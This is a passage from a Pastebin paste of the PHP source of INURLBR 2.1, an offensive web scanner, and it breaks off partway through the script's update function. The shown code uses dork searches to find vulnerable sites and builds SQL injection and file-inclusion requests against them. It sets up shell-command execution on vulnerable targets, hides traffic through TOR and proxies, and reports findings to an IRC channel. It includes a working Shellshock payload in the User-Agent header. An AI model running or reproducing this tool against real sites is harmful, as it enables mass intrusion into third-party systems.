galih039

Untitled

Jun 18th, 2018
1,361
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 212.04 KB | None | 0 0
  1. #!/usr/bin/php -q
  2. <?php
  3. /*
  4.  
  5. +-----------------------------------------------------------------------------+
  6. | [!] Legal disclaimer: Usage of INURLBR for attacking targets without prior |
  7. | mutual consent is illegal. |
  8. | It is the end user's responsibility to obey all applicable local, state and|
  9. | federal laws. |
  10. | Developers assume no liability and are not responsible for any misuse or |
  11. | damage caused by this program |
  12. +-----------------------------------------------------------------------------+
  13.  
  14.  
  15. [+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
  16. [+] Blog: http://blog.inurl.com.br
  17. [+] Twitter: https://twitter.com/googleinurl
  18. [+] Fanpage: https://fb.com/InurlBrasil
  19. [+] Pastebin http://pastebin.com/u/Googleinurl
  20. [+] GIT: https://github.com/googleinurl
  21. [+] PSS: http://packetstormsecurity.com/user/googleinurl
  22. [+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
  23. [+] YOUTUBE: http://youtube.com/c/INURLBrasil
  24. [+] PLUS: http://google.com/+INURLBrasil
  25.  
  26. [+] SCRIPT NAME: INURLBR 2.1
  27. INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.
  28. Tool made ​​in PHP that can run on different Linux distributions helps
  29. hackers / security professionals in their specific searches.
  30. With several options are automated methods of exploration, AND SCANNER is
  31. known for its ease of use and performasse.
  32. The inspiration to create the inurlbr scanner, was the XROOT Scan 5.2 application.
  33.  
  34. [+] Long desription
  35. The INURLBR tool was developed aiming to meet the need of Hacking community.
  36. Purpose: Make advanced searches to find potential vulnerabilities in web
  37. applications known as Google Hacking with various options and search filters,
  38. this tool has an absurd power of search engines available with
  39. (24) + 6 engines special(deep web)
  40.  
  41. - Possibility generate IP ranges or random_ip and analyze their targets.
  42. - Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
  43. - Execution external to exploit certain targets.
  44. - Generator dorks random or set file dork.
  45. - Option to set proxy, file proxy list, http proxy, file http proxy.
  46. - Set time random proxy.
  47. - It is possible to use TOR ip Random.
  48. - Debug processes urls, http request, process irc.
  49. - Server communication irc sending vulns urls for chat room.
  50. - Possibility injection exploit GET / POST => SQLI, LFI, LFD.
  51. - Filter and validation based regular expression.
  52. - Extraction of email and url.
  53. - Validation using http-code.
  54. - Search pages based on strings file.
  55. - Exploits commands manager.
  56. - Paging limiter on search engines.
  57. - Beep sound when trigger vulnerability note.
  58. - Use text file as a data source for urls tests.
  59. - Find personalized strings in return values of the tests.
  60. - Validation vulnerability shellshock.
  61. - File validation values wordpress wp-config.php.
  62. - Execution sub validation processes.
  63. - Validation syntax errors database and programmin.
  64. - Data encryption as native parameter.
  65. - Random google host.
  66. - Scan port.
  67. - Error Checking & values​​:
  68. [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
  69. [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
  70. [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  71. [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
  72. [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
  73. [*]ERROR INDEFINITE
  74.  
  75. [+] Dependencies - (PHP 5.4.*):
  76. sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl
  77.  
  78.  
  79. [+] Play LIST TUTORIAL:
  80. https://www.youtube.com/watch?v=jwjZUsgf9xM&list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR
  81.  
  82.  
  83. +--------------------------------------------------------------------------------------+
  84. | | | G R 3 3 T S | | |
  85. +--------------------------------------------------------------------------------------+
  86. * r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
  87. * Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
  88. * dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
  89. * Oystex, rH, Warflop, se4b3ar
  90.  
  91. */
  92.  
  93. error_reporting(0);
  94. set_time_limit(0);
  95. ini_set('memory_limit', '256M');
  96. ini_set('display_errors', 0);
  97. ini_set('max_execution_time', 0);
  98. ini_set('allow_url_fopen', 1);
  99. (!isset($_SESSION) ? session_start() : NULL);
  100. __OS();
  101.  
  102.  
  103. /*
  104. [+]Capturing TERMINAL VALUES.
  105. (PHP 4 >= 4.3.0, PHP 5)getopt - Gets options from the command line argument list
  106. http://php.net/manual/pt_BR/function.getopt.php */
  107. $commandos_list = array(
  108. 'dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:',
  109. 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:',
  110. 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:',
  111. 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:',
  112. 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:',
  113. 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:',
  114. 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::',
  115. 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::',
  116. 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::',
  117. 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::',
  118. 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:',
  119. 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'
  120. );
  121.  
  122. $opcoes = getopt('u::a:d:o:p:s:q:t:m::h::', $commandos_list);
  123.  
  124.  
  125. /*
  126. [+]VERIFYING LIB php5-curl IS INSTALLED.
  127. (PHP 4, PHP 5) function_exists — Return TRUE if the given function has been
  128. defined.
  129. http://php.net/manual/en/function.function-exists.php
  130.  
  131. [+]Verification - CURL_EXEC
  132. Execute the given cURL session.
  133. This function should be called after initializing a cURL session and all the
  134. options for the session are set.
  135. http://php.net/manual/en/function.curl-exec.php */
  136. (!function_exists('curl_exec') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c0"]}\n") : NULL );
  137.  
  138. /*
  139. [+]VERIFYING use Input PHP CLI.
  140. (PHP 4, PHP 5) defined — Checks whether a given named constant exists
  141. http://php.net/manual/pt_BR/function.defined.php */
  142. (!defined('STDIN') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} Please run it through command-line!{$_SESSION["c0"]}\n") : NULL);
  143.  
  144.  
  145. #[+]Resetting VALUES $ _SESSION ['config']
  146. $_SESSION['config'] = array();
  147. $_SESSION['config']['version_script'] = '2.1';
  148. $_SESSION['config']['totas_urls'] = NULL;
  149. $_SESSION['config']["contUrl"] = 0;
  150. $_SESSION['config']['cont_email'] = 0;
  151. $_SESSION['config']['cont_url'] = 0;
  152. $_SESSION['config']['cont_valores'] = 0;
  153.  
  154. #[+] FILE MANAGEMENT EXPLOITS.
  155. $_SESSION['config']['file_exploit_conf'] = 'exploits.conf';
  156.  
  157. #[+] FOLDER WHERE WILL BE SAVED PROCESSES.
  158. $_SESSION['config']['out_put_paste'] = 'output/';
  159.  
  160. /*
  161. [+]USER-AGENT EXPLOIT SHELLSHOCK
  162. (CVE-2014-6271, CVE-2014-6277,
  163. CVE-2014-6278, CVE-2014-7169,
  164. CVE-2014-7186, CVE-2014-7187)
  165. is a vulnerability in GNU's bash shell that gives attackers access to run remote
  166. commands on a vulnerable system. */
  167. $_SESSION['config']['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"";
  168.  
  169. #[+]BLACK LIST URL-STRINGS
  170. $_SESSION['config']['blacklist'] = "//t.co,google.,youtube.,jsuol.com,.radio.uol.,b.uol.,barra.uol.,whowhere.,hotbot.,amesville.,lycos,lygo.,orkut.,schema.,blogger.,bing.,w3.,yahoo.,yimg.,creativecommons.org,ndj6p3asftxboa7j.,.torproject.org,.lygo.com,.apache.org,.hostname.,document.,";
  171. $_SESSION['config']['blacklist'].= "live.,microsoft.,ask.,shifen.com,answers.,analytics.,googleadservices.,sapo.pt,favicon.,blogspot.,wordpress.,.css,scripts.js,jquery-1.,dmoz.,gigablast.,aol.,.macromedia.com,.sitepoint.,yandex.,www.tor2web.org,.securityfocus.com,.Bootstrap.,.metasploit.com,";
  172. $_SESSION['config']['blacklist'].= "aolcdn.,altavista.,clusty.,teoma.,baiducontent.com,wisenut.,a9.,uolhost.,w3schools.,msn.,baidu.,hao123.,shifen.,procog.,facebook.,twitter.,flickr.,.adobe.com,oficinadanet.,elephantjmjqepsw.,.shodan.io,kbhpodhnfxl3clb4,.scanalert.com,.prototype.,feedback.core,";
  173. $_SESSION['config']['blacklist'].= "4shared.,.KeyCodeTab,.style.,www/cache/i1,.className.,=n.,a.Ke=,Y.config,.goodsearch.com,style.top,n.Img,n.canvas.,t.search,Y.Search.,a.href,a.currentStyle,a.style,yastatic.,.oth.net,.hotbot.com,.zhongsou.com,ezilon.com,.example.com,location.href,.navigation.,";
  174. $_SESSION['config']['blacklist'].= ".bingj.com,Y.Mobile.,srpcache?p,stackoverflow.,shifen.,baidu.,baiducontent.,gstatic.,php.net,wikipedia.,webcache.,inurl.,naver.,navercorp.,windows.,window.,.devmedia,imasters.,.inspcloud.com,.lycos.com,.scorecardresearch.com,.target.,JQuery.min,Element.location.,";
  175. $_SESSION['config']['blacklist'].= "exploit-db,packetstormsecurity.,1337day,owasp,.sun.com,mobile10.dtd,onabort=function,inurl.com.br,purl.org,.dartsearch.net,r.cb,.classList.,.pt_BR.,github,microsofttranslator.com,.compete.com,.sogou.com,gmail.,blackle.com,boorow.com,gravatar.com,sourceforge.,.mozilla.org";
  176.  
  177. $_SESSION['config']['line'] = "\n{$_SESSION["c1"]} _[ - ]{$_SESSION["c7"]}::{$_SESSION["c1"]}--------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}";
  178.  
  179. #[+]PRINTING HELP / INFO
  180. (isset($opcoes['h']) || isset($opcoes['help']) || isset($opcoes['ajuda']) ? __menu() : NULL);
  181. (isset($opcoes['info']) ? __info() : NULL);
  182.  
  183. #[+]PRINTING EXPLOITS LIST.
  184. (isset($opcoes['exploit-list']) ? print(__bannerLogo()) . __configExploitsList(1) : NULL);
  185.  
  186. #[+]CREATING DEFAULT SETTINGS EXIT RESULTS.
  187. (!is_dir($_SESSION['config']['out_put_paste']) ? mkdir($_SESSION['config']['out_put_paste'], 0777, TRUE) : NULL);
  188.  
  189. #[+]CREATING DEFAULT SETTINGS MANAGEMENT EXPLOITS.
  190. (!file_exists($_SESSION['config']['file_exploit_conf']) ? touch($_SESSION['config']['file_exploit_conf']) : NULL);
  191.  
  192. #[+]Deletes FILE cookie STANDARD.
  193. (file_exists('cookie.txt') ? unlink('cookie.txt') : NULL);
  194.  
  195. #[+]REGISTRATION NEW COMMAND EXPLOIT
  196. (not_isnull_empty($opcoes['exploit-cad']) ? __configExploitsADD($opcoes['exploit-cad']) : NULL);
  197.  
  198. #[+]Dependencies installation
  199. (isset($opcoes['install-dependence']) ? __installDepencia() : NULL);
  200.  
  201. #[+]UPDATE SCRIPT
  202. (isset($opcoes['update']) ? __update() : NULL);
  203.  
  204. ################################################################################
  205. #CAPTURE OPTIONS################################################################
  206. ################################################################################
  207. #[+]VALIDATION SEARCH METHODS / (DORK,RANGE-IP)
  208. if (not_isnull_empty($opcoes['o'])) {
  209.  
  210. $_SESSION['config']['abrir-arquivo'] = $opcoes['o'];
  211. } else if (!not_isnull_empty($opcoes['o']) &&
  212. !not_isnull_empty($opcoes['range']) &&
  213. !not_isnull_empty($opcoes['range-rand']) &&
  214. !not_isnull_empty($opcoes['dork-rand'])) {
  215.  
  216. $_SESSION['config']['dork'] = not_isnull_empty($opcoes['dork']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork'] : NULL;
  217. $_SESSION['config']['dork-file'] = not_isnull_empty($opcoes['dork-file']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork-file'] : NULL;
  218. (!not_isnull_empty($_SESSION['config']['dork']) && !not_isnull_empty($_SESSION['config']['dork-file']) ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE DORK ex: --dork '.asp?CategoryID=' OR --dork-file 'dorks.txt'{$_SESSION["c0"]}\n") : NULL);
  219. }
  220.  
  221. #[+]VALIDATION GENERATE DORKS RANDOM
  222. $_SESSION['config']['dork-rand'] = not_isnull_empty($opcoes['dork-rand']) ? $opcoes['dork-rand'] : NULL;
  223.  
  224. #[+]VALIDATION TARGET FIND PAGE
  225. $_SESSION['config']['target'] = not_isnull_empty($opcoes['target']) && !isset($_SESSION['config']['dork']) ? $opcoes['target'] : NULL;
  226.  
  227. #[+]VALIDATION URL EXTRACTION
  228. $_SESSION['config']['extrai-url'] = isset($opcoes['u']) ? TRUE : NULL;
  229.  
  230. #[+]VALIDATION EMAIL EXTRACTION
  231. $_SESSION['config']['extrai-email'] = isset($opcoes['m']) ? TRUE : NULL;
  232.  
  233. #[+]VALIDATION ID SEARCH ENGINE
  234. $_SESSION['config']['motor'] = not_isnull_empty($opcoes['q']) &&
  235. __validateOptions('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,e1,e2,e3,e4,e5,e6,all', $opcoes['q']) ? $opcoes['q'] : 1;
  236.  
  237. #[+]VALIDATION SAVE FILE VULNERABLE
  238. !not_isnull_empty($opcoes['s']) && !not_isnull_empty($opcoes['save-as']) && empty($opcoes['sall']) ?
  239. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE FILE SAVE OUTPUT ex: -s , --save-as , --sall filevull.txt{$_SESSION["c0"]}\n") : NULL;
  240.  
  241. $_SESSION['config']['s'] = not_isnull_empty($opcoes['s']) ? $opcoes['s'] : null;
  242.  
  243. $_SESSION['config']['save-as'] = not_isnull_empty($opcoes['save-as']) ? $opcoes['save-as'] : null;
  244.  
  245. $_SESSION['config']['arquivo_output'] = not_isnull_empty($_SESSION['config']['s']) ? $_SESSION['config']['s'] : $opcoes['save-as'];
  246.  
  247. #[+]VALIDATION SAVE FILE ALL VALORES
  248. $_SESSION['config']['arquivo_output_all'] = not_isnull_empty($opcoes['sall']) ? $opcoes['sall'] : NULL;
  249.  
  250. #[+]VALIDATION TYPE ERROR
  251. $_SESSION['config']['tipoerro'] = not_isnull_empty($opcoes['t']) && __validateOptions('1,2,3,4,5', $opcoes['t']) ? $opcoes['t'] : 1;
  252.  
  253. #[+]VALIDATION REPLACEMENT VALUES
  254. $_SESSION['config']['replace'] = not_isnull_empty($opcoes['replace']) ? $opcoes['replace'] : NULL;
  255.  
  256. #[+]VALIDATION SET PROXY
  257. $_SESSION['config']['proxy'] = not_isnull_empty($opcoes['proxy']) ? $opcoes['proxy'] : NULL;
  258.  
  259. #[+]VALIDATION SET FILE WITH LIST OF PROXY
  260. $_SESSION['config']['proxy-file'] = not_isnull_empty($opcoes['proxy-file']) ? $opcoes['proxy-file'] : NULL;
  261.  
  262. #[+]VALIDATION SET HTTP->PROXY
  263. $_SESSION['config']['proxy-http'] = not_isnull_empty($opcoes['proxy-http']) ? $opcoes['proxy-http'] : NULL;
  264.  
  265. #[+]VALIDATION SET FILE WITH LIST OF HTTP->PROXY
  266. $_SESSION['config']['proxy-http-file'] = not_isnull_empty($opcoes['proxy-http-file']) ? $opcoes['proxy-http-file'] : NULL;
  267.  
  268. #[+]VALIDATION SET EXPLOIT VIA REQUEST GET
  269. $_SESSION['config']['exploit-get'] = not_isnull_empty($opcoes['exploit-get']) ? str_replace(' ', '%20', $opcoes['exploit-get']) : NULL;
  270.  
  271. #[+]VALIDATION SET EXPLOIT VIA REQUEST POST
  272. $_SESSION['config']['exploit-post'] = not_isnull_empty($opcoes['exploit-post']) ? __convertUrlQuery($opcoes['exploit-post']) : NULL;
  273. $_SESSION['config']['exploit-post_str'] = not_isnull_empty($opcoes['exploit-post']) ? $opcoes['exploit-post'] : NULL;
  274.  
  275. #[+]VALIDATION COMMAND SHELL STRING COMPLEMENTARY
  276. $_SESSION['config']['exploit-command'] = not_isnull_empty($opcoes['exploit-command']) ? $opcoes['exploit-command'] : NULL;
  277.  
  278. #[+]VALIDATION MANAGEMENT COMMANDS SHELL TARGET VULN ID
  279. $_SESSION['config']['exploit-vul-id'] = not_isnull_empty($opcoes['exploit-vul-id']) ? $opcoes['exploit-vul-id'] : NULL;
  280.  
  281. #[+]VALIDATION MANAGEMENT COMMANDS SHELL ALL TARGET ID
  282. $_SESSION['config']['exploit-all-id'] = not_isnull_empty($opcoes['exploit-all-id']) ? $opcoes['exploit-all-id'] : NULL;
  283.  
  284. #[+]VALIDATION SET COMMANDS SHELL EXECUTE TARGET VULN
  285. $_SESSION['config']['command-vul'] = not_isnull_empty($opcoes['command-vul']) ? $opcoes['command-vul'] : NULL;
  286.  
  287. #[+]VALIDATION SET COMMANDS SHELL EXECUTE ALL TARGET
  288. $_SESSION['config']['command-all'] = not_isnull_empty($opcoes['command-all']) ? $opcoes['command-all'] : NULL;
  289.  
  290. #[+]VALIDATION ADDITIONAL TYPE OF PARAMETER ERROR
  291. $_SESSION['config']['achar'] = not_isnull_empty($opcoes['a']) ? $opcoes['a'] : NULL;
  292.  
  293. #[+]VALIDATION DEBUG NIVEL
  294. $_SESSION['config']['debug'] = not_isnull_empty($opcoes['d']) && __validateOptions('1,2,3,4,5,6', $opcoes['d']) ? $opcoes['d'] : NULL;
  295.  
  296. #[+]VALIDATION INTERNAL
  297. $_SESSION['config']['verifica_info'] = (__validateOptions($opcoes['d'], 6)) ? 1 : NULL;
  298.  
  299. #[+]VALIDATION ADDITIONAL PARAMETER PROXY
  300. $_SESSION['config']['tor-random'] = isset($opcoes['tor-random']) && !is_null($_SESSION["config"]["proxy"]) ? TRUE : NULL;
  301.  
  302. #[+]VALIDATION CHECK VALUES CMS
  303. $_SESSION['config']['cms-check'] = isset($opcoes['cms-check']) ? TRUE : NULL;
  304.  
  305. #[+]VALIDATION CHECK LINKS WEBCACHE GOOGLE
  306. $_SESSION['config']['webcache'] = isset($opcoes['gc']) ? TRUE : NULL;
  307.  
  308. #[+]VALIDATION REGULAR EXPRESSION
  309. $_SESSION['config']['regexp'] = not_isnull_empty($opcoes['regexp']) ? $opcoes['regexp'] : NULL;
  310.  
  311. #[+]VALIDATION FILTER BY REGULAR EXPRESSION
  312. $_SESSION['config']['regexp-filter'] = not_isnull_empty($opcoes['regexp-filter']) ? $opcoes['regexp-filter'] : NULL;
  313.  
  314. #[+]VALIDATION NO BANNER SCRIPT
  315. $_SESSION['config']['no-banner'] = isset($opcoes['no-banner']) ? TRUE : NULL;
  316.  
  317. #[+]VALIDATION SET USER-AGENT REQUEST
  318. $_SESSION['config']['user-agent'] = not_isnull_empty($opcoes['user-agent']) ? $opcoes['user-agent'] : NULL;
  319.  
  320. #[+]VALIDATION SET URL-REFERENCE REQUEST
  321. $_SESSION['config']['url-reference'] = not_isnull_empty($opcoes['url-reference']) ? $opcoes['url-reference'] : NULL;
  322.  
  323. #[+]VALIDATION PAGING THE MAXIMUM SEARCH ENGINE
  324. $_SESSION['config']['max_pag'] = not_isnull_empty($opcoes['mp']) ? $opcoes['mp'] : NULL;
  325.  
  326. #[+]VALIDATION DELAY SET PAGING AND PROCESSES
  327. $_SESSION['config']['delay'] = not_isnull_empty($opcoes['delay']) ? $opcoes['delay'] : NULL;
  328.  
  329. #[+]VALIDATION SET TIME OUT REQUEST
  330. $_SESSION['config']['time-out'] = not_isnull_empty($opcoes['time-out']) ? $opcoes['time-out'] : NULL;
  331.  
  332. #[+]VALIDATION CODE HTTP
  333. $_SESSION['config']['ifcode'] = not_isnull_empty($opcoes['ifcode']) ? $opcoes['ifcode'] : NULL;
  334.  
  335. #[+]VALIDATION STRING URL
  336. $_SESSION['config']['ifurl'] = not_isnull_empty($opcoes['ifurl']) ? $opcoes['ifurl'] : NULL;
  337.  
  338. #[+]VALIDATION SET HTTP HEADER
  339. $_SESSION['config']['http-header'] = not_isnull_empty($opcoes['http-header']) ? $opcoes['http-header'] : NULL;
  340.  
  341. #[+]VALIDATION SET FILE SUB_PROCESS
  342. $_SESSION['config']['sub-file'] = not_isnull_empty($opcoes['sub-file']) ? __openFile($opcoes['sub-file'], 1) : NULL;
  343.  
  344. #[+]VALIDATION SUB_PROCESS TYPE REQUEST POST
  345. $_SESSION['config']['sub-post'] = isset($opcoes['sub-post']) ? TRUE : NULL;
  346.  
  347. #[+]VALIDATION SUB_PROCESS TYPE REQUEST GET
  348. $_SESSION['config']['sub-get'] = isset($opcoes['sub-get']) ? TRUE : NULL;
  349.  
  350. #[+]VALIDATION SEND VULN EMAIL
  351. $_SESSION['config']['sendmail'] = not_isnull_empty($opcoes['sendmail']) ? $opcoes['sendmail'] : NULL;
  352.  
  353. #[+]VALIDATION SHOW RANK ALEXA
  354. $_SESSION['config']['alexa-rank'] = isset($opcoes['alexa-rank']) ? TRUE : NULL;
  355.  
  356. #[+]VALIDATION ACTIVATE BEEP WHEN APPEAR VULNERABLE
  357. $_SESSION['config']['beep'] = isset($opcoes['beep']) ? TRUE : NULL;
  358.  
  359. #[+]VALIDATION OF SINGLE DOMAIN FILTER
  360. $_SESSION['config']['unique'] = isset($opcoes['unique']) ? TRUE : NULL;
  361.  
  362. #[+]VALIDATION IRC SERVER/CHANNEL SEND VULN
  363. $_SESSION['config']['irc']['conf'] = not_isnull_empty($opcoes['irc']) && strstr($opcoes['irc'], '#') ? explode("#", $opcoes['irc']) : NULL;
  364.  
  365. #[+]VALIDATION RANGE IP
  366. $_SESSION['config']['range'] = not_isnull_empty($opcoes['range']) && strstr($opcoes['range'], ',') ? $opcoes['range'] : NULL;
  367.  
  368. #[+]VALIDATION QUANTITY RANGE IP RANDOM
  369. $_SESSION['config']['range-rand'] = not_isnull_empty($opcoes['range-rand']) ? $opcoes['range-rand'] : NULL;
  370.  
  371. #[+]VALIDATION REMOVE STRING URL
  372. $_SESSION['config']['remove'] = not_isnull_empty($opcoes['remove']) ? $opcoes['remove'] : NULL;
  373.  
  374. #[+]VALIDATION ACCESS FILE ROBOTS
  375. $_SESSION['config']['robots'] = isset($opcoes['robots']) ? TRUE : NULL;
  376.  
  377. #[+]VALIDATION FILTER EMAIL STRING
  378. $_SESSION['config']['ifemail'] = not_isnull_empty($opcoes['ifemail']) ? $opcoes['ifemail'] : NULL;
  379.  
  380. #[+]VALIDATION OPEN WINDOW CONSOLE PROCESS
  381. $_SESSION['config']['popup'] = isset($opcoes['popup']) ? TRUE : NULL;
  382.  
  383. #[+]VALIDATION ACTIVATE SHELLSHOCK
  384. $_SESSION['config']['shellshock'] = isset($opcoes['shellshock']) ? TRUE : NULL;
  385.  
  386. #[+]VALIDATION METHOD OF BUSTA PROGRESSIVE
  387. $_SESSION['config']['pr'] = isset($opcoes['pr']) ? TRUE : NULL;
  388.  
  389. #[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE ALL TARGET
  390. $_SESSION['config']['sub-cmd-all'] = isset($opcoes['sub-cmd-all']) ? TRUE : NULL;
  391.  
  392. #[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE TARGET VULN
  393. $_SESSION['config']['sub-cmd-vul'] = isset($opcoes['sub-cmd-vul']) ? TRUE : NULL;
  394.  
  395. #[+]VALIDATION SET POR VALIDATION
  396. $_SESSION['config']['port-cmd'] = not_isnull_empty($opcoes['port-cmd']) ? $opcoes['port-cmd'] : NULL;
  397.  
  398. #[+]VALIDATION SET SCAN PORT
  399. $_SESSION['config']['port-scan'] = not_isnull_empty($opcoes['port-scan']) ? $opcoes['port-scan'] : NULL;
  400.  
  401. #[+]VALIDATION SET PAYLOAD XPL PORT
  402. $_SESSION['config']['port-write'] = not_isnull_empty($opcoes['port-write']) ? $opcoes['port-write'] : NULL;
  403.  
  404. #[+]VALIDATION SET URL REDIRECT HEADER
  405. $_SESSION['config']['ifredirect'] = not_isnull_empty($opcoes['ifredirect']) ? $opcoes['ifredirect'] : NULL;
  406.  
  407. #[+]VALIDATION SET URL REDIRECT HEADER
  408. $_SESSION['config']['persist'] = not_isnull_empty($opcoes['persist']) ? $opcoes['persist'] : 4;
  409.  
  410. #[+]VALIDATION SET FILE COOKIE
  411. $_SESSION['config']['file-cookie'] = not_isnull_empty($opcoes['file-cookie']) ? $opcoes['file-cookie'] : NULL;
  412.  
  413. #[+]VALIDATION SET STRING CONCAT URL SUB-PROCESS
  414. $_SESSION['config']['sub-concat'] = not_isnull_empty($opcoes['sub-concat']) ? $opcoes['sub-concat'] : NULL;
  415.  
  416. ################################################################################
  417. #IRC CONFIGURATION##############################################################
  418. ################################################################################
  419.  
  420. if (is_array($_SESSION['config']['irc']['conf'])) {
  421.  
  422. $alph = range("A", "Z");
  423. $_ = array(0 => rand(0, 10000), 1 => $alph[rand(0, count($alph))]);
  424. $_SESSION['config']['irc']['my_pid'] = 0;
  425. $_SESSION['config']['irc']['irc_server'] = $_SESSION['config']['irc']['conf'][0];
  426. $_SESSION['config']['irc']['irc_channel'] = "#{$_SESSION['config']['irc']['conf'][1]}";
  427. $_SESSION['config']['irc']['irc_port'] = 6667;
  428. $_SESSION['config']['irc']['localhost'] = "127.0.0.1 localhost";
  429. $_SESSION['config']['irc']['irc_nick'] = "[BOT]1nurl{$_[0]}[{$_[1]}]";
  430. $_SESSION['config']['irc']['irc_realname'] = "B0t_1NURLBR";
  431. $_SESSION['config']['irc']['irc_quiet'] = "Session Ended";
  432. global $conf;
  433. } elseif (!is_array($_SESSION['config']['irc']['conf']) && not_isnull_empty($opcoes['irc'])) {
  434.  
  435. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}IRC WRONG FORMAT! ex: --irc 'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}\n");
  436. }
  437.  
  438. ################################################################################
  439. #IRC CONECTION##################################################################
  440. ################################################################################
  441.  
  442. function __ircConect($conf) {
  443.  
  444. $fp = fsockopen($conf['irc_server'], $conf['irc_port'], $conf['errno'], $conf['errstr'], 30);
  445. if (!$fp) {
  446.  
  447. echo "Error: {$conf['errstr']}({$conf['errno']})\n";
  448. return NULL;
  449. }
  450. $u = php_uname();
  451. fwrite($fp, "NICK {$conf['irc_nick']}\r\n");
  452. fwrite($fp, "USER {$conf['irc_nick']} 8 * :{$conf['irc_realname']}\r\n");
  453. fwrite($fp, "JOIN {$conf['irc_channel']}\r\n");
  454. fwrite($fp, "PRIVMSG {$conf['irc_channel']} :[ SERVER ] {$u}\r\n");
  455. return $fp;
  456. }
  457.  
  458. ################################################################################
  459. #IRC SEND MSG###################################################################
  460. ################################################################################
  461.  
  462. function __ircMsg($conf, $msg) {
  463.  
  464. fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :${msg}\r\n") . sleep(2);
  465. __plus();
  466. }
  467.  
  468. ################################################################################
  469. #IRC PING PONG##################################################################
  470. ################################################################################
  471.  
  472. function __ircPong($conf) {
  473.  
  474. while (!feof($conf['irc_connection'])) {
  475.  
  476. $conf['READ_BUFFER'] = fgets($conf['irc_connection']);
  477. __plus();
  478. if (preg_match("/^PING(.+)/", $conf['READ_BUFFER'], $conf['ret'])) {
  479.  
  480. __debug(array('debug' => "[ PING-PONG ]{$conf['ret'][1]}", 'function' => '__ircPong'), 6) . __plus();
  481. fwrite($conf['READ_BUFFER'], "PONG {$conf['ret'][1]}\r\n");
  482. ($_SESSION['config']['debug'] == 6) ?
  483. fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :[ PING-PONG ]-> {$conf['ret'][1]}->function:__ircPong\r\n") : NULL;
  484. }
  485. }
  486. }
  487.  
  488. ################################################################################
  489. #IRC QUIT#######################################################################
  490. ################################################################################
  491.  
  492. function __ircQuit($conf) {
  493.  
  494. fwrite($conf['irc_connection'], "QUIT {$conf['irc_quiet']}\r\n") . sleep(2);
  495. __plus();
  496. fclose($conf['irc_connection']);
  497. }
  498.  
  499. #END IRC########################################################################
  500. #UPDATE SCRIPT##################################################################
  501. ################################################################################
  502.  
  503. function __update() {
  504.  
  505. echo __bannerLogo();
  506.  
  507. echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}WANT TO MAKE UPDATE SCRIPT\n{$_SESSION["c0"]}";
  508. echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}This can modify the current script\n{$_SESSION["c0"]}";
  509. echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}ARE YOU SURE ? (y \ n): {$_SESSION["c0"]}";
  510.  
  511. if (trim(fgets(STDIN)) == 'y') {
  512.  
  513. $resultado = __request_info("https://raw.githubusercontent.com/googleinurl/SCANNER-INURLBR/master/inurlbr.php", $_SESSION["config"]["proxy"], NULL);
  514.  
  515. if (not_isnull_empty($resultado['corpo'])) {
  516.  
  517. unlink('inurlbr.php');
